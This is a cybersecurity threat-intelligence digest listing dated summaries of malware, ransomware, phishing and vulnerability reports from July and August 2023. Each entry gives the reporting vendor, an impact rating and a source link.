Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/

Intel Source:: Proofpoint

Intel Name:: WikiLoader_Favors_Complex_Evasion

Date of Scan:: 2023-08-01

Impact:: LOW

Summary:: WikiLoader is a new piece of malware that Proofpoint researchers have discovered. It was originally discovered in December 2022 being delivered by TA544, an attacker who frequently targets Italian enterprises with Ursnif malware. They also noticed numerous succeeding initiatives, the majority of which had Italian groups as their target.

Source: https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion

Intel Source:: PaloAlto

Intel Name:: URLs_That_Deliver_Ransomware

Date of Scan:: 2023-08-01

Impact:: LOW

Summary:: Researchers from Palo Alto have seen that threat actors are increasingly using URLs to deliver ransomware as they look for new ways to get their inventions past victims' defenses. Additionally, they are utilizing more dynamic behaviors to spread their malware. Threat actors frequently switch hostnames, paths, filenames, or a combination of all three to disperse ransomware, in addition to following the tried-and-true method of deploying polymorphic variants of their ransomware.

Source: https://unit42.paloaltonetworks.com/url-delivered-ransomware/#post-129339-_cfw3vjr99swz

Intel Source:: Avast

Intel Name:: The_Unknown_Risks_of_Dot_Zip_Domains

Date of Scan:: 2023-08-01

Impact:: LOW

Summary:: Cybercriminals have begun using.zip domains to trick people into thinking they are downloadable files rather than URLs, according to Avast researchers. According to research, one-third of the top 30.zip domains blacklisted by threat detection engines misuse the names of well-known IT firms like Microsoft, Google, Amazon, and Paypal to deceive users into thinking they are files from reputable businesses.

Source: https://decoded.avast.io/matejkrcma/unpacking-the-threats-within-the-hidden-dangers-of-zip-domains/

Intel Source:: Cyble

Intel Name:: The_Cunning_XWorms_Multi_Staged_Attack

Date of Scan:: 2023-08-01

Impact:: LOW

Summary:: The XWorm malware uses a new multistage approach to deliver its payload utilizing LOLBins, according to an analysis by Cyble researchers.

Source: https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/

Intel Source:: Team-Cymru

Intel Name:: The_IcedID_BackConnect_Protocol_Internals

Date of Scan:: 2023-08-01

Impact:: LOW

Summary:: Researchers from Team-Cymru have updated their investigation and monitoring of the infrastructure linked to IcedID's BackConnect protocol.

Source: https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2

Intel Source:: Bitdefender

Intel Name:: Threat_Actors_Abusing_the_Ad_Network

Date of Scan:: 2023-07-31

Impact:: MEDIUM

Summary:: A threat actor with previous roots in cybercrime has shifted its initial access techniques to search engine advertisements to hijack searches for business applications such as AnyDesk, WinSCP, Cisco AnyConnect, Slack, TreeSize and potentially more. Bitdefender research showed that the actor(s) has successfully used this type of attack since late May 2023. Based on their threat insights, attackers seem to exclusively focus on North America. Until now, we have identified six target organizations in the US and one in Canada.

Source: https://blogapp.bitdefender.com/labs/content/files/2023/07/Bitdefender-PR-WhitePaper-RatNitro-dex14210-en_EN.pdf

Intel Source:: Securonix Threat Labs

Intel Name:: STARK_MULE_Targeting_Koreans_With_US_Military_Themed_Document_Lures

Date of Scan:: 2023-07-31

Impact:: MEDIUM

Summary:: Securonix researchers have detected an ongoing cyber assault campaign that is targeting Korean-speaking people by using document lures with American military themes to fool them into launching malware on compromised systems.

Source: https://www.securonix.com/blog/detecting-ongoing-starkmule-attack-campaign-targeting-victims-using-us-military-document-lures/

Intel Source:: Dr. Web

Intel Name:: Fruity_Trojan_Downloaders_Infect_Windows_Systems_in_Multiple_Stages

Date of Scan:: 2023-07-31

Impact:: LOW

Summary:: Dr.Web researchers have observed that threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity with the goal of installing remote trojans tools like Remcos RAT.

Source: https://news.drweb.com/show/?i=14728&lng=en

Intel Source:: CISA

Intel Name:: SEASPY_Backdoor

Date of Scan:: 2023-07-31

Impact:: MEDIUM

Summary:: CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.

Source: https://www.cisa.gov/news-events/analysis-reports/ar23-209b

Intel Source:: CISA

Intel Name:: v2_SUBMARINE_Backdoor

Date of Scan:: 2023-07-31

Impact:: MEDIUM

Summary:: The US Department of Homeland Security (CISA) has released a report on a new type of backdoor malware, which could be used by hackers to gain access to a network of secure email addresses. CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions 5.1.3.001 - 9.2.0.006 of Barracuda Email Security Gateway (ESG).

Source: https://www.cisa.gov/news-events/analysis-reports/ar23-209a

Intel Source:: CISA

Intel Name:: CISA_Analyses_Report_v1_Exploit_Payload_Backdoor

Date of Scan:: 2023-07-31

Impact:: MEDIUM

Summary:: CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.

Source: https://www.cisa.gov/news-events/analysis-reports/ar23-209c

Intel Source:: Blackberry

Intel Name:: Behavioral_detection_tips_for_the_RomCom_campaign

Date of Scan:: 2023-07-28

Impact:: MEDIUM

Summary:: This article provides a technical analysis of the RomCom threat group, which is targeting politicians in Ukraine and U.S.-based healthcare organizations. It outlines process activity, IoCs, and Sigma rules to detect malicious behavior, such as the execution of a file from the Temp folder with a specific command line, and the use of COM objects to establish system persistence.

Source: https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection

Intel Source:: Sophos

Intel Name:: The_discover_of_apps_targeting_Iranian_bank_customers

Date of Scan:: 2023-07-28

Impact:: LOW

Summary:: Sophos X-Ops researchers discovered malicious apps targeting Iranian banks, which collect internet banking login credentials and credit card details, and have capabilities such as hiding icons and intercepting SMS messages. The threat actors used Firebase as a C2 mechanism and leveraged legitimate domains for C2 servers. The malware also searches for other banking, payment, and cryptocurrency apps, and the certificate used to sign the malicious apps was previously used by an IT consulting and development firm in Malaysia. The malicious apps request permissions to read SMS messages and urge users to grant them.

Source: https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/

Intel Source:: Sophos

Intel Name:: A_New_Malicious_Campaign_Distributing_IT_Tools

Date of Scan:: 2023-07-28

Impact:: LOW

Summary:: Researchers from Sophos have discovered a new malvertising campaign that targets users looking for IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP by using ads on Google Search and Bing. This campaign attempts to trick users into downloading trojanized installers in order to access corporate networks and possibly launch future ransomware attacks.

Source: https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/

Intel Source:: Recorded Future

Intel Name:: BlueBravo_Attacks_European_Diplomatic_Entities

Date of Scan:: 2023-07-28

Impact:: MEDIUM

Summary:: In order to deliver a new backdoor named GraphicalProton, the Russian nation-state actor known as BlueBravo has been detected targeting diplomatic institutions around Eastern Europe. This illustrates the threat's ongoing evolution. The use of lawful internet services (LIS) for command-and-control (C2) obfuscation is a defining feature of the phishing campaign.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf

Intel Source:: Trellix

Intel Name:: Exploiting_of_the_search_ms_URI_Protocol_Handler

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: This article discusses the use of malicious payloads, such as AsyncRAT and Remcos RAT, by attackers to gain remote control over an infected system. It also covers the use of the “search” / “search-ms” URI protocol handler to launch attacks using a variety of file types, and how to disable this protocol handler. Additionally, it provides configuration information for AsyncRAT, including two IP addresses, six ports, a default botnet, a version number, and various settings.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html

Intel Source:: Splunk

Intel Name:: The_Analysis_of_Amadey_Threat

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: The Amadey Trojan Stealer, an active and prominent malware, first emerged on the cybersecurity landscape in 2018 and has maintained a persistent botnet infrastructure ever since. Several campaigns have used this malware.

Source: https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html

Intel Source:: Aquasec

Intel Name:: Tomcat_attacked_by_Mirai_Malware_and_beyond

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: This article discusses the misconfiguration of Apache Tomcat, the impact of the malware 'l4sd4sx64', and the prevalence of Apache Tomcat in cloud, big data, and website development. It also provides an analysis of the attacks against Tomcat server honeypots over a two-year period, including the detection of a web shell hidden in a WAR file, the execution of a shell script, and the execution of the Mirai malware.

Source: https://blog.aquasec.com/tomcat-under-attack-investigating-the-mirai-malware

Intel Source:: ASEC

Intel Name:: PurpleFox_Loader_Distributing_via_MS_SQL_Server

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: ASEC researchers have discovered the PurpleFox malware being installed on poorly managed MS-SQL servers. PurpleFox is a Loader that downloads additional malware and is known to mainly install CoinMiners.

Source: https://asec.ahnlab.com/en/55492/

Intel Source:: ASEC

Intel Name:: Lazarus_Threat_Group_Attacking_Windows_Servers

Date of Scan:: 2023-07-27

Impact:: MEDIUM

Summary:: ASEC researchers have discovered that Lazarus, a threat group deemed to be nationally funded, is attacking Windows Internet Information Service (IIS) web servers and using them as distribution points for their malware.

Source: https://asec.ahnlab.com/en/55369/

Intel Source:: Microsoft

Intel Name:: The_Investigation_of_Cloud_Compute_Resource_Abuse

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: Microsoft researchers have observed an attack that is targeting organizations that incurred more than $300,000 in computing fees due to cryptojacking attacks

Source: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/

Intel Source:: Sygnia

Intel Name:: Casbaneiro_Infection_Chain_is_Back

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: Sygnia researchers have observed that threat actors behind the Casbaneiro campaign are still active to this day, with some changes over the years in their attack chain, C2 infrastructure, and TTPs. The threat actors are still making effective use of spear-phishing attack to initiate their infection chain, and still appear to be focused on Latin American targets.

Source: https://blog.sygnia.co/breaking-down-casbaneiro-infection-chain-part2

Intel Source:: GitHub Blog

Intel Name:: Jade_Sleet_Storm_0954_Social_Engineering_Campaign

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: GitHub has observed a Jade Sleet social engineering campaign which targets employees of technology firms, those who are connected to the blockchain, cryptocurrency, online gambling, and cybersecurity sectors. Jade Sleet (Storm-0954) is an activity group originally from North Korea and specializes in targeting cryptocurrency-related organizations. They utilize a range of tactics lke the development of applications that look like legitimate cryptocurrency apps, to spread their attacks. Jade Sleet has used the multi-platform targeted malware framework (MATA) and Electron frameworks to create implants for both Microsoft Windows and Mac-based systems.

Source: https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/

Intel Source:: Zscaler

Intel Name:: In_depth_Campaign_Analysis_of_QakBot

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: Researchers from Zscaler have conducted in-depth investigations to uncover the various attack chains employed by Qakbot. In this research, they delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods.

Source: https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis

Intel Source:: PaloAlto

Intel Name:: Diving_Deep_into_Mallox_Ransomware

Date of Scan:: 2023-07-27

Impact:: MEDIUM

Summary:: Unit 42 researchers have observed an uptick of Mallox ransomware activities with an increase of almost 174% compared to the previous year exploiting MS-SQL servers to distribute the ransomware. Mallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft Windows systems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims' networks.

Source: https://unit42.paloaltonetworks.com/mallox-ransomware/

Intel Source:: Checkmarx

Intel Name:: Targeted_Open_Source_Software_Supply_Chain_Attacks_on_Banking_Sector

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: The banking sector is facing targeted open-source software supply chain attacks. Malicious actors exploit vulnerabilities in open-source packages, utilizing advanced techniques and deceptive tactics. Traditional controls fall short, necessitating proactive security measures throughout the Software Development Lifecycle (SDLC). Collaboration is key to strengthen defenses against these evolving threats. Checkmarx's Supply Chain Intelligence offers protection and ongoing tracking.

Source: https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/

Intel Source:: ICS CERT

Intel Name:: Attack_Tactics_Against_Industrial_Organizations

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: Researchers from Kaspersky ICS CERT have looked at a number of assaults on commercial targets in Eastern Europe. The attackers' goal in the attacks was to create an ongoing conduit for data exfiltration, including data from air-gapped systems. Based on the commonalities between these operations and other efforts that have been previously studied (such as ExCone and DexCone), including the use of FourteenHi variants, particular TTPs, and the scale of the attack.

Source: https://ics-cert.kaspersky.com/publications/reports/2023/07/20/common-ttps-of-attacks-against-industrial-organizations-implants-for-remote-access/

Intel Source:: Cyble

Intel Name:: Hackers_Targeting_Developers_via_Trojanized_MS_Visual_Studio

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: Cyble researchers have uncovered a deceitful installer masquerading as an authentic Microsoft Visual Studio installer delivering a Cookie Stealer. This stealer is specifically designed to infiltrate and extract sensitive information stored in browser cookies, allowing attackers to compromise user accounts and invade privacy.

Source: https://blog.cyble.com/2023/07/25/threat-actor-targeting-developers-via-trojanized-ms-visual-studio/

Intel Source:: Fortinet

Intel Name:: Cl0p_Ransomware_Financially_Motivated_Menace_Exploiting_Critical_Vulnerabilities

Date of Scan:: 2023-07-27

Impact:: MEDIUM

Summary:: Cl0p ransomware, operated by the FIN11 threat group, has been a persistent and financially motivated menace since early 2019. This malicious software targets organizations in North America and Europe, encrypting files and exfiltrating sensitive data. Recent attacks have exploited critical vulnerabilities in software, including the MOVEit Transfer SQL injection flaw. The ransom group demands payment in exchange for file decryption and to prevent the public exposure of stolen information

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-cl0p

Intel Source:: Cyfirma

Intel Name:: A_Deceptive_and_Evolving_Malware_Tool

Date of Scan:: 2023-07-27

Impact:: LOW

Summary:: Cyfirma has identified a new threat in the cybersecurity landscape - Attacker-Crypter. This powerful tool allows cybercriminals to encrypt, obfuscate, and manipulate malicious code, evading detection by security tools and antivirus software. The freely available tool offers various features to enhance malware capabilities, including process injection, debugger evasion, and network communication.

Source: https://www.cyfirma.com/outofband/attacker-crypter-v0-9-unveiling-a-powerful-tool-for-evading-antivirus-and-enhancing-malware-capabilities/

Intel Source:: Mandiant

Intel Name:: The_Deep_Investigation_of_JumpCloud_System_Breach

Date of Scan:: 2023-07-27

Impact:: MEDIUM

Summary:: Mandiant researchers have investigated the JumpCloud system breach and its impact on customers. Mandiant attributed these intrusions to UNC4899, a Democratic People's Republic of Korea (DPRK)-nexus actor, with a history of targeting companies within the cryptocurrency vertical.

Source: https://www.mandiant.com/resources/blog/north-korea-supply-chain

Intel Source:: Avast

Intel Name:: The_Dangers_of_Downloading_Illegal_Software_and_the_Hidden_AutoHotkey_Script

Date of Scan:: 2023-07-26

Impact:: MEDIUM

Summary:: In a recent rise in malware activity, malicious AutoHotkey scripts that started the HotRat virus on victims' PCs were bundled with illicit software, according to Avast researchers. This malware spreads via open repositories, with URLs being shared on social media and online discussion boards.

Source: https://decoded.avast.io/martinchlumecky/hotrat-the-risks-of-illegal-software-downloads-and-hidden-autohotkey-script-within/

Intel Source:: Sentilone

Intel Name:: JumpCloud_Intrusion_linked_to_North_Korean_APT_Activity

Date of Scan:: 2023-07-26

Impact:: MEDIUM

Summary:: Sentilone shared the details after investigation and attributed this attack to an unnamed “sophisticated nation-state sponsored threat actor”. Additionally, there are updated IOCs released and researchers associated the cluster of threat activity to a North Korean state sponsored APT. The IOCs are linked to a wide variety of activity that Sentilone attributes to DPRK, overall centric to the supply chain targeting approach seen in previous campaigns.

Source: https://www.sentinelone.com/labs/jumpcloud-intrusion-attacker-infrastructure-links-compromise-to-north-korean-apt-activity/?utm_source=substack&utm_medium=email

Intel Source:: Eclecticiq

Intel Name:: Spearphishing_Campaign_Targeting_Zimbra_Webmail_Portals_of_Government_Organizations

Date of Scan:: 2023-07-26

Impact:: MEDIUM

Summary:: Researchers at EclecticIQ have discovered a spearphishing effort that uses vulnerable Zimbra and Roundcube email servers to target governmental institutions. The effort began in January 2023 and has primarily targeted Ukrainian government organizations, however it has also targeted Spain, Indonesia, and France.

Source: https://blog.eclecticiq.com/spearphishing-campaign-targets-zimbra-webmail-portals-of-government-organizations

Intel Source:: Proofpoint

Intel Name:: Scammers_Targeting_Universities_With_Bioscience_Lures

Date of Scan:: 2023-07-26

Impact:: LOW

Summary:: Researchers from Proofpoint have seen a campaign that targets university students in North America in late May 2023 using a variety of email lures with job-related themes. The emails claimed to be from several different organizations, the bulk of which were involved in the biosciences, healthcare, and biotechnology, as well as a few other unrelated ones. The operation went on until June 2023.

Source: https://www.proofpoint.com/us/blog/threat-insight/job-scams-using-bioscience-lures-target-universitie

Intel Source:: PaloAlto

Intel Name:: The_Rusty_peer_to_Peer_self_Replicating_worm_Called_P2PInfect

Date of Scan:: 2023-07-26

Impact:: LOW

Summary:: Cloud researchers at Unit 42 have found a fresh peer-to-peer (P2P) worm that they named P2PInfect. This worm is capable of cross-platform infections and is written in the highly scalable and cloud-friendly programming language Rust. It targets Redis, a well-known open-source database application that is frequently utilized in cloud environments.

Source: https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/

Intel Source:: Cyfirma

Intel Name:: Hackers_Behind_Big_Head_and_Poop69_Ransomware_Are_DEV0970_Storm_0970

Date of Scan:: 2023-07-26

Impact:: LOW

Summary:: CYFIRMA research team have observed Poop69 ransomware appearing in the wild, and shortly after that, another ransomware named BIG HEAD emerged, thought to originate from the same threat actor, which has become popular recently due to its fake Windows update method.

Source: https://www.cyfirma.com/outofband/dev-0970-storm-0970-the-threat-actors-behind-big-head-and-poop69-ransomware/

Intel Source:: Fortinet

Intel Name:: Zyxel_Vulnerability_Targeted_by_DDoS_Botnets

Date of Scan:: 2023-07-26

Impact:: MEDIUM

Summary:: Researchers from FortiGuard have discovered the spread of many DDoS botnets that are taking use of the Zyxel vulnerability (CVE-2023-28771). It is possible for an unauthorized attacker to execute arbitrary code by sending a specially designed packet to the targeted device, which is how this vulnerability is defined by a command injection bug impacting several firewall models.

Source: https://www.fortinet.com/blog/threat-research/ddos-botnets-target-zyxel-vulnerability-cve-2023-28771

Intel Source:: Securilist

Intel Name:: Outlook_Vulnerability_and_Clever_Attacker_Tactics

Date of Scan:: 2023-07-25

Impact:: LOW

Summary:: Securilist shared retheir analyses CVE-2023-23397 vulnerability in Microsoft Outlook for Windows allowed attackers to leak Net-NTLMv2 hashes by sending malicious objects. Samples exploiting this flaw targeted various entities from March 2022 to March 2023. Attackers used compromised ISP routers for hosting fake SMB servers.

Source: https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/

Intel Source:: CERT-UA

Intel Name:: Turla_Attacks_Using_CAPIBAR_and_KAZUAR_Malware

Date of Scan:: 2023-07-25

Impact:: MEDIUM

Summary:: CERT-UA researchers have discovered that in addition to the use of XSLT (Extensible Stylesheet Language Transformations) and COM-hijacking, the specificity of CAPIBAR is the presence of a server part, which is typically installed on infected MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DCS) PowerShell tool, effectively converting a legitimate server into a malware control center.

Source: https://cert.gov.ua/article/5213167

Intel Source:: Malwarebytes

Intel Name:: New_Campaign_Distributing_NetSupport_RAT_Through_Fake_Browser_Updates

Date of Scan:: 2023-07-25

Impact:: LOW

Summary:: Researchers from Malwarebytes have observed a new campaign called FakeSG is distributing the NetSupport RAT through hacked WordPress websites. It uses fake browser update templates to deceive users. The payload is delivered via Internet shortcuts or zipped downloads.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/07/socgholish-copycat-delivers-netsupport-rat

Intel Source:: JPCERT/CC

Intel Name:: DangerousPasswords_Python_and_Nodejs_Malware_Across_Platforms

Date of Scan:: 2023-07-25

Impact:: LOW

Summary:: JPCERT/CC has shared about DangerousPassword, a targeted attack group, is targeting developers of cryptocurrency exchange businesses on Windows, macOS, and Linux environments. They use Python and Node.js malware to infect systems. The malware downloads and executes MSI files (Windows) and Python files (macOS, Linux) from external sources, communicating with a C2 server every minute.

Source: https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html

Intel Source:: Fotinet

Intel Name:: Threat_Actors_Embrace_ZIP_Domains_in_Deceptive_Attacks

Date of Scan:: 2023-07-25

Impact:: LOW

Summary:: FortiGate researchers have observed new '.ZIP' Top-Level Domain (TLD) to launch sophisticated phishing attacks. These domains can trick users into thinking they are downloading files when they're actually visiting malicious websites.

Source: https://www.fortinet.com/blog/industry-trends/threat-actors-add-zip-domains-to-phishing-arsenals

Intel Source:: HP Labs

Intel Name:: Cybercriminals_Using_Ads_to_Spread_IcedID_and_Infostealers

Date of Scan:: 2023-07-25

Impact:: MEDIUM

Summary:: Researchers from HP Labs have observed two major malware campaigns delivering Vidar Stealer and IcedID, both of which use malvertising and imitate well-known software. Also, seen other families distributed using this method, including BatLoader and Rhadamanthys Stealer, indicating the growing popularity of this delivery mechanism among threat actors.

Source: https://threatresearch.ext.hp.com/adverts-mimicking-popular-software-leads-to-malware/?web_view=true

Intel Source:: Checkpoint

Intel Name:: BundleBot_A_Stealthy_Threat_Abusing_Self_Contained_Dotnet_Format

Date of Scan:: 2023-07-25

Impact:: MEDIUM

Summary:: Check Point Research (CPR) conducted an analysis of a new malware strain called BundleBot, which is spreading covertly. BundleBot uses the dotnet bundle (single-file), self-contained format, making static detection challenging. The malware is commonly distributed via Facebook Ads and compromised accounts, masquerading as legitimate program utilities, AI tools, and games.

Source: https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/

Intel Source:: Cofense

Intel Name:: The_Use_of_HTML_Attachments_in_Phishing_Campaigns_Has_Increased

Date of Scan:: 2023-07-24

Impact:: LOW

Summary:: Researchers from Cofense have observed developments in the phishing and email security scene. The use of HTML attachments in dangerous phishing attempts has increased significantly, by 168% and 450%, respectively, compared to both Q1 and Q2 of the preceding two years.

Source: https://cofense.com/blog/html-attachments-used-in-malicious-phishing-campaigns/

Intel Source:: Symantec

Intel Name:: Modified_Sardonic_Backdoor_by_FIN8_Group

Date of Scan:: 2023-07-24

Impact:: LOW

Summary:: Symantec researchers have found evidence of the financially motivated threat actor known as FIN8 employing a "revamped" variation of the Sardonic backdoor to spread the BlackCat ransomware.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor

Intel Source:: Sonatype

Intel Name:: NullRAT_InfoStealer_Targeting_PyPI_Package_for_Windows

Date of Scan:: 2023-07-24

Impact:: LOW

Summary:: Sonatype's automated malware detection systems discovered sonatype-2023-2950, a malicious PyPI package with the name "feur," which has since been taken down.

Source: https://blog.sonatype.com/quoi...-feur-from-meme-to-malware-pypi-package-targets-windows-with-nullrat-info-stealer

Intel Source:: Permiso

Intel Name:: Agile_Approach_to_Mass_Cloud_Credential_Harvesting_and_Crypto_Mining_Sprints_Ahead

Date of Scan:: 2023-07-24

Impact:: LOW

Summary:: Researchers from Permiso have observed Attackers are using an agile approach for mass cloud credential harvesting and crypto mining. They developed and deployed incremental iterations of their malware, targeting multiple cloud services. The campaign includes multi-cloud support, possible German-speaking actors, and hosting on Nice VPS.

Source: https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/?utm_source=substack&utm_medium=email

Intel Source:: Rapid7

Intel Name:: Exploiting_Several_Adobe_ColdFusion_Vulnerabilities_Actively

Date of Scan:: 2023-07-24

Impact:: LOW

Summary:: Researchers from Rapid7 have discovered that criminals are actively taking advantage of two ColdFusion flaws to circumvent authentication, remotely execute commands, and install webshells on vulnerable servers. Threat actors are combining exploits for the critical remote code execution vulnerability CVE-2023-38203 and the access control bypass vulnerability CVE-2023-29298.

Source: https://www.rapid7.com/blog/post/2023/07/17/etr-active-exploitation-of-multiple-adobe-coldfusion-vulnerabilities/

Intel Source:: Bleeding Computer, Jumpcloud

Intel Name:: JumpCloud_had_a_breach_by_state_backed_APT_hacking_group

Date of Scan:: 2023-07-23

Impact:: MEDIUM

Summary:: US-based enterprise software firm JumpCloud says a state-backed hacking group breached its systems almost one month ago as part of a highly targeted attack focused on a limited set of customers. The company discovered the incident on June 27, one week after the attackers breached its systems via a spear-phishing attack. On July 5, JumpCloud discovered "unusual activity in the commands framework for a small set of customers" while investigating the attack and analyzing logs for signs of malicious activity.

Source: https://www.bleepingcomputer.com/news/security/jumpcloud-discloses-breach-by-state-backed-apt-hacking-group/ https://jumpcloud.com/support/july-2023-iocs

Intel Source:: Microsoft

Intel Name:: The_deeper_details_of_Storm_0558_techniques_for_unauthorized_access

Date of Scan:: 2023-07-23

Impact:: LOW

Summary:: Earlier this month, Microsoft shared detailed information about a malicious campaign by a threat actor Storm-0558 that targeted customer email. Microsoft continued their investigation into this incident and deployed defense in depth to harden all systems involved, additionally they are providing their deeper analysis of the observed actor techniques for obtaining unauthorized access to email data, tools, and unique infrastructure characteristics.

Source: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/

Intel Source:: Netscope

Intel Name:: AWS_Amplify_Hosted_Phishing_Campaigns

Date of Scan:: 2023-07-23

Impact:: LOW

Summary:: Last couple months, Netskope Threat Labs researchers observed an increase in traffic to phishing pages hosted in AWS Amplify. These attacks have been targeting victims across different segments, led by the technology and finance verticals.

Source: https://www.netskope.com/de/blog/aws-amplify-hosted-phishing-campaigns-abusing-telegram-static-forms

Intel Source:: Perception Point

Intel Name:: A_complex_phishing_operation_Manipulated_Caiman

Date of Scan:: 2023-07-22

Impact:: LOW

Summary:: Perception Point investigated for a complex phishing operation that cwas called “Manipulated Caiman”. The threat actor, Manipulated Caiman, based on one of the files analyzed, containing the words “Loader Manipulado” in the pdb path. Seems like attacker’s origin is likely Latin America. Manipulated Caiman employs spear phishing with malicious attachments to deliver malware, such as URSA, SMTP bruteforce client, malicious extension installer, net info checker, and spammer client.

Source: https://perception-point.io/blog/manipulated-caiman-the-sophisticated-snare-of-mexicos-banking-predators-technical-edition/

Intel Source:: Security Intelligence

Intel Name:: The_delivery_of_BlotchyQuasar_malware

Date of Scan:: 2023-07-22

Impact:: MEDIUM

Summary:: IBM Security X-Force discovered some phishing emails leading to packed executable files delivering malware called BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments.

Source: https://securityintelligence.com/posts/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/

Intel Source:: eSentire

Intel Name:: The_Delivery_of_Sorillus_RAT

Date of Scan:: 2023-07-21

Impact:: LOW

Summary:: Esentire researchers have identified Sorillus RAT, and a phishing page delivering using HTML smuggled files and links using Google’s Firebase Hosting service.

Source: https://www.esentire.com/blog/google-firebase-hosting-abused-to-deliver-sorillus-rat-phishing-page

Intel Source:: Vadesecure

Intel Name:: M365_Phishing_Email_Analysis

Date of Scan:: 2023-07-20

Impact:: LOW

Summary:: Vade’s researchers have detected a new Microsoft 365 phishing attack and analyzed an email containing a malicious HTML attachment.

Source: https://www.vadesecure.com/en/blog/m365-phishing-email-analysis-eevilcorp

Intel Source:: Fortinet

Intel Name:: Diving_Deep_into_Rancoz_Ransomware

Date of Scan:: 2023-07-20

Impact:: LOW

Summary:: FortiGate researchers have observed that a few months back the Rancoz ransomware first came to the public's attention. However, it's important to raise awareness of this ransomware variant, as the most recent victim on their data leak site on TOR dates back just a few weeks to mid-June.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-rancoz

Intel Source:: Cyfirma

Intel Name:: A_High_Evasive_Blank_Grabber_Returns

Date of Scan:: 2023-07-20

Impact:: LOW

Summary:: CYFIRMA researchers have identified an infostealer builder known as ‘Blank Grabber’. It is released in 2022, however, since then, it has been frequently updated with 85 contributions to the project in the last one month alone. The infostealer targets Windows operating systems and possesses a wide range of capabilities aimed at stealing sensitive information from unsuspecting users.

Source: https://www.cyfirma.com/outofband/blank-grabber-returns-with-high-evasiveness/

Intel Source:: Citizenlab

Intel Name:: The_Analysis_of_HKLEAKS_Campaign

Date of Scan:: 2023-07-20

Impact:: LOW

Summary:: Researchers from Citizen Lab have conducted a forensic analysis of the entire identifiable digital footprint of the HKLEAKS campaign. In August 2019, at the height of the Anti-Extradition Bill protests that rocked Hong Kong, a series of websites branded “HKLEAKS” began surfacing on the web. Claiming to be run by anonymous citizens, they systematically exposed (“dotted”) the personal identifiable information of protesters, journalists, and other individuals perceived as affiliated with the protest movement.

Source: https://citizenlab.ca/2023/07/hkleaks-covert-and-overt-online-harassment-tactics-to-repress-the-2019-hong-kong-protests/

Intel Source:: CERT-HR

Intel Name:: WordPress_Plugin_ULTIMATE_MEMBER_Is_Vulnerable

Date of Scan:: 2023-07-19

Impact:: LOW

Summary:: CERT-HR researchers have observed that 'Ultimate Member' is a plugin that allows registration and management of communities on WordPress sites. The critical vulnerability (CVE-2023-3460) has been rated 9.8. All versions of the plugin, which has more than 200,000 active installations, are vulnerable.

